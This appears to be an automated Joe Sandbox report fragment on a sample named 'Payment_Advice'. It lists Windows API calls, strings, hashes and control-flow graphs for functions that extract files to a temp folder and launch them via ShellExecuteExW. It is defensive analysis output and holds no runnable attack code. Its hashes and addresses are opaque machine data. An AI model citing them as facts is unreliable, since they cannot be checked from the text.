                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9S
                                                                                                    • API String ID: 557298264-1325100120
                                                                                                    • Opcode ID: 110b8bcf5253894804ac3e02a6e28e5c4663e2b97346ed5a000dcb5eff4fd192
                                                                                                    • Instruction ID: ed905a44177dd65b47b131cb966c8d4feb1bfd9975d671978c9ced6252083a26
                                                                                                    • Opcode Fuzzy Hash: 110b8bcf5253894804ac3e02a6e28e5c4663e2b97346ed5a000dcb5eff4fd192
                                                                                                    • Instruction Fuzzy Hash: EF32D072900219DBDB24EFA8C84AAEE7FB9FF55300F50095AF905972C1E7B19D85CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0051B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0051B579
                                                                                                      • Part of subcall function 0051B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0051B58A
                                                                                                      • Part of subcall function 0051B568: IsDialogMessageW.USER32(00010440,?), ref: 0051B59E
                                                                                                      • Part of subcall function 0051B568: TranslateMessage.USER32(?), ref: 0051B5AC
                                                                                                      • Part of subcall function 0051B568: DispatchMessageW.USER32(?), ref: 0051B5B6
                                                                                                    • GetDlgItem.USER32(00000068,0055FCB8), ref: 0051D4E8
                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0051AF07,00000001,?,?,0051B7B9,0053506C,0055FCB8,0055FCB8,00001000,00000000,00000000), ref: 0051D510
                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0051D51B
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,005335F4), ref: 0051D529
                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0051D53F
                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0051D559
                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0051D59D
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0051D5AB
                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0051D5BA
                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0051D5E1
                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,005343F4), ref: 0051D5F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                    • String ID: \
                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                    • Opcode ID: c0db05bbcb3ff61496d5d33324b0aae7c64ae88275a585ff821651cd9d139923
                                                                                                    • Instruction ID: a70c0c4511880b97b48c3a78dc1256a347d1ae6bec37f217444d1b4f675ba9c0
                                                                                                    • Opcode Fuzzy Hash: c0db05bbcb3ff61496d5d33324b0aae7c64ae88275a585ff821651cd9d139923
                                                                                                    • Instruction Fuzzy Hash: B731AF71545342ABE301DB289C4AFAB7FACEBA2718F000518F95196290DBA49B0C9B76
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 681 51d78f-51d7a7 call 51ec50 684 51d9e8-51d9f0 681->684 685 51d7ad-51d7b9 call 523e13 681->685 685->684 688 51d7bf-51d7e7 call 51fff0 685->688 691 51d7f1-51d7ff 688->691 692 51d7e9 688->692 693 51d801-51d804 691->693 694 51d812-51d818 691->694 692->691 695 51d808-51d80e 693->695 696 51d85b-51d85e 694->696 697 51d810 695->697 698 51d837-51d844 695->698 696->695 699 51d860-51d866 696->699 700 51d822-51d82c 697->700 701 51d9c0-51d9c2 698->701 702 51d84a-51d84e 698->702 703 51d868-51d86b 699->703 704 51d86d-51d86f 699->704 707 51d81a-51d820 700->707 708 51d82e 700->708 709 51d9c6 701->709 702->709 710 51d854-51d859 702->710 703->704 706 51d882-51d898 call 50b92d 703->706 705 51d871-51d878 704->705 704->706 705->706 711 51d87a 705->711 716 51d8b1-51d8bc call 50a231 706->716 717 51d89a-51d8a7 call 511fbb 706->717 707->700 713 51d830-51d833 707->713 708->698 715 51d9cf 709->715 710->696 711->706 713->698 718 51d9d6-51d9d8 715->718 727 51d8d9-51d8e6 ShellExecuteExW 716->727 728 51d8be-51d8d5 call 50b6c4 716->728 717->716 726 51d8a9 717->726 721 51d9e7 718->721 722 51d9da-51d9dc 718->722 721->684 722->721 725 51d9de-51d9e1 ShowWindow 722->725 725->721 726->716 727->721 729 51d8ec-51d8f9 727->729 728->727 731 51d8fb-51d902 729->731 732 51d90c-51d90e 729->732 731->732 734 51d904-51d90a 731->734 735 51d910-51d919 IsWindowVisible 732->735 736 51d925-51d938 WaitForInputIdle call 51dc3b 732->736 734->732 737 51d97b-51d987 CloseHandle 734->737 735->736 738 51d91b-51d923 ShowWindow 735->738 740 51d93d-51d944 736->740 741 51d989-51d996 call 511fbb 737->741 742 51d998-51d9a6 737->742 738->736 740->737 745 51d946-51d94e 740->745 741->715 741->742 742->718 744 51d9a8-51d9aa 742->744 744->718 747 51d9ac-51d9b2 744->747 745->737 748 51d950-51d961 GetExitCodeProcess 745->748 747->718 749 51d9b4-51d9be 747->749 748->737 750 51d963-51d96d 748->750 749->718 751 51d974 750->751 752 51d96f 750->752 751->737 752->751
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 0051D7AE
                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0051D8DE
                                                                                                    • IsWindowVisible.USER32(?), ref: 0051D911
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0051D91D
                                                                                                    • WaitForInputIdle.USER32(?,000007D0), ref: 0051D92E
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0051D959
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0051D97F
                                                                                                    • ShowWindow.USER32(?,00000001), ref: 0051D9E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                                                                                    • String ID: .exe$.inf
                                                                                                    • API String ID: 3646668279-3750412487
                                                                                                    • Opcode ID: 22a1d8f72b196750b7d89ec622ed62d8919a0a6b7702ce8d00a2438090542496
                                                                                                    • Instruction ID: 9c467d5c63997c1034cc01bb3a436f36a99b947f4c738884efe25a1735deedba
                                                                                                    • Opcode Fuzzy Hash: 22a1d8f72b196750b7d89ec622ed62d8919a0a6b7702ce8d00a2438090542496
                                                                                                    • Instruction Fuzzy Hash: 4B51BF75408384AAFB209B249844BEBBFF4BF96744F04081DF9C197191E7B589C9DB72
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 753 51ce87-51ce8a 754 51ce90-51ceb5 GetTempPathW call 50b690 753->754 755 51d009-51d00c 753->755 763 51ceb9-51cee5 call 504092 call 50a231 754->763 757 51d012-51d018 755->757 758 51d3d9-51d404 call 51b314 755->758 760 51d024-51d02b 757->760 761 51d01a 757->761 766 51c793-51c7a1 758->766 767 51d40a-51d418 758->767 760->758 761->760 776 51ceb7-51ceb8 763->776 777 51cee7-51cefe SetDlgItemTextW 763->777 768 51c7a2-51c7b7 call 51af98 766->768 775 51c7b9 768->775 778 51c7bb-51c7d0 call 511fbb 775->778 776->763 777->758 779 51cf04-51cf0a 777->779 785 51c7d2-51c7d6 778->785 786 51c7dd-51c7e0 778->786 779->758 781 51cf10-51cf2b call 5222c6 779->781 787 51cf7b-51cf82 781->787 788 51cf2d-51cf39 781->788 785->778 789 51c7d8 785->789 786->758 790 51c7e6 786->790 792 51cfb4-51cfe4 call 51add2 call 51a7e4 787->792 793 51cf84-51cfaf call 510602 * 2 787->793 788->787 791 51cf3b 788->791 789->758 794 51c7ed-51c7f0 790->794 795 51ca7c-51ca7e 790->795 796 51ca5f-51ca61 790->796 797 51c9be-51c9c0 790->797 798 51cf3e-51cf42 791->798 792->758 832 51cfea-51d004 EndDialog 792->832 793->792 794->758 803 51c7f6-51c850 call 51a64d call 50bdf3 call 50a544 call 50a67e call 506edb 794->803 795->758 800 51ca84-51ca8b 795->800 796->758 799 51ca67-51ca77 SetWindowTextW 796->799 797->758 801 51c9c6-51c9d2 797->801 806 51cf44-51cf52 798->806 807 51cf56-51cf73 call 510602 798->807 799->758 800->758 808 51ca91-51caaa 800->808 809 51c9d4-51c9e5 call 527686 801->809 810 51c9e6-51c9eb 801->810 870 51c98f-51c9a4 call 50a5d1 803->870 806->798 814 51cf54 806->814 807->787 816 51cab2-51cac0 call 523e13 808->816 817 51caac 808->817 809->810 821 51c9f5-51ca00 call 51b48e 810->821 822 51c9ed-51c9f3 810->822 814->787 816->758 839 51cac6-51cacf 816->839 817->816 823 51ca05-51ca07 821->823 822->823 833 51ca12-51ca32 call 523e13 call 523e3e 823->833 834 51ca09-51ca10 call 523e13 823->834 832->758 859 51ca34-51ca3b 833->859 860 51ca4b-51ca4d 833->860 834->833 843 51cad1-51cad5 839->843 844 51caf8-51cafb 839->844 845 51cb01-51cb04 843->845 846 51cad7-51cadf 843->846 844->845 848 51cbe0-51cbee call 510602 844->848 853 51cb11-51cb2c 845->853 854 51cb06-51cb0b 845->854 846->758 851 51cae5-51caf3 call 510602 846->851 861 51cbf0-51cc04 call 52279b 848->861 851->861 871 51cb76-51cb7d 853->871 872 51cb2e-51cb68 853->872 854->848 854->853 866 51ca42-51ca4a call 527686 859->866 867 51ca3d-51ca3f 859->867 860->758 862 51ca53-51ca5a call 523e2e 860->862 881 51cc11-51cc6b call 510602 call 51b1be GetDlgItem SetWindowTextW SendMessageW call 523e49 861->881 882 51cc06-51cc0a 861->882 862->758 866->860 867->866 888 51c855-51c869 SetFileAttributesW 870->888 889 51c9aa-51c9b9 call 50a55a 870->889 875 51cbab-51cbce call 523e13 * 2 871->875 876 51cb7f-51cb97 call 523e13 871->876 905 51cb6a 872->905 906 51cb6c-51cb6e 872->906 875->861 910 51cbd0-51cbde call 5105da 875->910 876->875 892 51cb99-51cba6 call 5105da 876->892 881->758 921 51cc71-51cc85 SendMessageW 881->921 882->881 887 51cc0c-51cc0e 882->887 887->881 894 51c90f-51c91f GetFileAttributesW 888->894 895 51c86f-51c8a2 call 50b991 call 50b690 call 523e13 888->895 889->758 892->875 894->870 903 51c921-51c930 DeleteFileW 894->903 926 51c8b5-51c8c3 call 50bdb4 895->926 927 51c8a4-51c8b3 call 523e13 895->927 903->870 909 51c932-51c935 903->909 905->906 906->871 913 51c939-51c965 call 504092 GetFileAttributesW 909->913 910->861 922 51c937-51c938 913->922 923 51c967-51c97d MoveFileW 913->923 921->758 922->913 923->870 925 51c97f-51c989 MoveFileExW 923->925 925->870 926->889 932 51c8c9-51c909 call 523e13 call 51fff0 SHFileOperationW 926->932 927->926 927->932 932->894
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0051CE9D
                                                                                                      • Part of subcall function 0050B690: _wcslen.LIBCMT ref: 0050B696
                                                                                                    • _swprintf.LIBCMT ref: 0051CED1
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                    • SetDlgItemTextW.USER32(?,00000066,0054946A), ref: 0051CEF1
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0051CF22
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0051CFFE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                                                    • String ID: %s%s%u
                                                                                                    • API String ID: 689974011-1360425832
                                                                                                    • Opcode ID: 0f04047112c41f766c135918c494d09fc64ce97e0af7aa700e4882295c4397d8
                                                                                                    • Instruction ID: cff72eb2ff152dd001d95a6cf97c88f4865eb3de4efb8862958672a9bcf15517
                                                                                                    • Opcode Fuzzy Hash: 0f04047112c41f766c135918c494d09fc64ce97e0af7aa700e4882295c4397d8
                                                                                                    • Instruction Fuzzy Hash: 3741B4B5840659AAEF219B50CC45EEE7BBCFB45304F4084A6F909E7081EE758A88DF71
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph
                                                                                                    control_flow_graph 937 523b72-523b7c 938 523bee-523bf1 937->938 939 523bf3 938->939 940 523b7e-523b8c 938->940 941 523bf5-523bf9 939->941 942 523b95-523bb1 LoadLibraryExW 940->942 943 523b8e-523b91 940->943 946 523bb3-523bbc GetLastError 942->946 947 523bfa-523c00 942->947 944 523b93 943->944 945 523c09-523c0b 943->945 949 523beb 944->949 945->941 950 523be6-523be9 946->950 951 523bbe-523bd3 call 526088 946->951 947->945 948 523c02-523c03 FreeLibrary 947->948 948->945 949->938 950->949 951->950 954 523bd5-523be4 LoadLibraryExW 951->954 954->947 954->950
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00523C35,00000000,00000FA0,00562088,00000000,?,00523D60,00000004,InitializeCriticalSectionEx,00536394,InitializeCriticalSectionEx,00000000), ref: 00523C03
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID: api-ms-$c*R
                                                                                                    • API String ID: 3664257935-1332622827
                                                                                                    • Opcode ID: 6fc3f11a543943ef310ec3033c118ff4b1d4f366fa093a0b3730cded88139313
                                                                                                    • Instruction ID: 07e810df10423967dee90e66ab8729da6f397bb516fbae3cd897377b82965fa9
                                                                                                    • Opcode Fuzzy Hash: 6fc3f11a543943ef310ec3033c118ff4b1d4f366fa093a0b3730cded88139313
                                                                                                    • Instruction Fuzzy Hash: 58119136A45631ABCB228F68AC45B5A3FA4BF12770F250150F915FB2D0E768EE049AD1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph
                                                                                                    control_flow_graph 955 52a95b-52a974 956 52a976-52a986 call 52ef4c 955->956 957 52a98a-52a98f 955->957 956->957 964 52a988 956->964 959 52a991-52a999 957->959 960 52a99c-52a9c0 MultiByteToWideChar 957->960 959->960 962 52ab53-52ab66 call 51fbbc 960->962 963 52a9c6-52a9d2 960->963 965 52aa26 963->965 966 52a9d4-52a9e5 963->966 964->957 968 52aa28-52aa2a 965->968 969 52a9e7-52a9f6 call 532010 966->969 970 52aa04-52aa15 call 528e06 966->970 973 52aa30-52aa43 MultiByteToWideChar 968->973 974 52ab48 968->974 969->974 980 52a9fc-52aa02 969->980 970->974 981 52aa1b 970->981 973->974 977 52aa49-52aa5b call 52af6c 973->977 978 52ab4a-52ab51 call 52abc3 974->978 985 52aa60-52aa64 977->985 978->962 984 52aa21-52aa24 980->984 981->984 984->968 985->974 987 52aa6a-52aa71 985->987 988 52aa73-52aa78 987->988 989 52aaab-52aab7 987->989 988->978 992 52aa7e-52aa80 988->992 990 52ab03 989->990 991 52aab9-52aaca 989->991 995 52ab05-52ab07 990->995 993 52aae5-52aaf6 call 528e06 991->993 994 52aacc-52aadb call 532010 991->994 992->974 996 52aa86-52aaa0 call 52af6c 992->996 997 52ab41-52ab47 call 52abc3 993->997 1011 52aaf8 993->1011 994->997 1010 52aadd-52aae3 994->1010 995->997 998 52ab09-52ab22 call 52af6c 995->998 996->978 1008 52aaa6 996->1008 997->974 998->997 1012 52ab24-52ab2b 998->1012 1008->974 1013 52aafe-52ab01 1010->1013 1011->1013 1014 52ab67-52ab6d 1012->1014 1015 52ab2d-52ab2e 1012->1015 1013->995 1016 52ab2f-52ab3f WideCharToMultiByte 1014->1016 1015->1016 1016->997 1017 52ab6f-52ab76 call 52abc3 1016->1017 1017->978
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005257FB,005257FB,?,?,?,0052ABAC,00000001,00000001,2DE85006), ref: 0052A9B5
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0052ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0052AA3B
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0052AB35
                                                                                                    • __freea.LIBCMT ref: 0052AB42
                                                                                                      • Part of subcall function 00528E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00524286,?,0000015D,?,?,?,?,00525762,000000FF,00000000,?,?), ref: 00528E38
                                                                                                    • __freea.LIBCMT ref: 0052AB4B
                                                                                                    • __freea.LIBCMT ref: 0052AB70
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: 8ebef2b6da2afb80be081ea1e93d2be7d46774724e0b76b11dd2a65a4da9e27d
                                                                                                    • Instruction ID: dc171be6f59fe5b9fd2a20f020c3d28ccd37c9afe021be95d0674d4ffbdfff5d
                                                                                                    • Opcode Fuzzy Hash: 8ebef2b6da2afb80be081ea1e93d2be7d46774724e0b76b11dd2a65a4da9e27d
                                                                                                    • Instruction Fuzzy Hash: CD51D272600226AFDB258E64EC55EBBBFAAFF86710F154669FC04D61C0EB34DC40D691
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph
                                                                                                    control_flow_graph 1020 51abab-51abca GetClassNameW 1021 51abf2-51abf4 1020->1021 1022 51abcc-51abe1 call 511fbb 1020->1022 1023 51abf6-51abf8 1021->1023 1024 51abff-51ac01 1021->1024 1027 51abf1 1022->1027 1028 51abe3-51abef FindWindowExW 1022->1028 1023->1024 1027->1021 1028->1027
                                                                                                    APIs
                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0051ABC2
                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0051ABF9
                                                                                                      • Part of subcall function 00511FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0050C116,00000000,.exe,?,?,00000800,?,?,?,00518E3C), ref: 00511FD1
                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0051ABE9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                    • String ID: @UJu$EDIT
                                                                                                    • API String ID: 4243998846-1013725496
                                                                                                    • Opcode ID: a3f1759e1fbc444e5adb83d8887333fb1f9b8e59e78cdad10ff3df5309d58d2e
                                                                                                    • Instruction ID: 2a5d18f57887080f8536b571c0d8861bcb3445520206006c2fbeff23260ef8f8
                                                                                                    • Opcode Fuzzy Hash: a3f1759e1fbc444e5adb83d8887333fb1f9b8e59e78cdad10ff3df5309d58d2e
                                                                                                    • Instruction Fuzzy Hash: 3DF0823260122976EB2156289C09FDB7AACAB46B50F484051FA05A31C0D7A4EA8AC5BA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph
                                                                                                    control_flow_graph 1029 5098e0-509901 call 51ec50 1032 509903-509906 1029->1032 1033 50990c 1029->1033 1032->1033 1034 509908-50990a 1032->1034 1035 50990e-50991f 1033->1035 1034->1035 1036 509921 1035->1036 1037 509927-509931 1035->1037 1036->1037 1038 509933 1037->1038 1039 509936-509943 call 506edb 1037->1039 1038->1039 1042 509945 1039->1042 1043 50994b-50996a CreateFileW 1039->1043 1042->1043 1044 5099bb-5099bf 1043->1044 1045 50996c-50998e GetLastError call 50bb03 1043->1045 1047 5099c3-5099c6 1044->1047 1049 5099c8-5099cd 1045->1049 1051 509990-5099b3 CreateFileW GetLastError 1045->1051 1047->1049 1050 5099d9-5099de 1047->1050 1049->1050 1052 5099cf 1049->1052 1053 5099e0-5099e3 1050->1053 1054 5099ff-509a10 1050->1054 1051->1047 1055 5099b5-5099b9 1051->1055 1052->1050 1053->1054 1056 5099e5-5099f9 SetFileTime 1053->1056 1057 509a12-509a2a call 510602 1054->1057 1058 509a2e-509a39 1054->1058 1055->1047 1056->1054 1057->1058
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00507760,?,00000005,?,00000011), ref: 0050995F
                                                                                                    • GetLastError.KERNEL32(?,?,00507760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0050996C
                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00507760,?,00000005,?), ref: 005099A2
                                                                                                    • GetLastError.KERNEL32(?,?,00507760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 005099AA
                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00507760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 005099F9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                    • String ID:
                                                                                                    • API String ID: 1999340476-0
                                                                                                    • Opcode ID: e382105cb8eec01cce321dfb928bc960f4142e051a2319169613a96743db2bfa
                                                                                                    • Instruction ID: 8d6866a80ed5c4ab6d05c6541c70d317b04661c9f75ab9b9e3b9b9061e6e6ace
                                                                                                    • Opcode Fuzzy Hash: e382105cb8eec01cce321dfb928bc960f4142e051a2319169613a96743db2bfa
                                                                                                    • Instruction Fuzzy Hash: 2D3122305447466FE7309F24CC4ABEEBF94BB44320F200F19F9A1962D6D3B4A988CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%
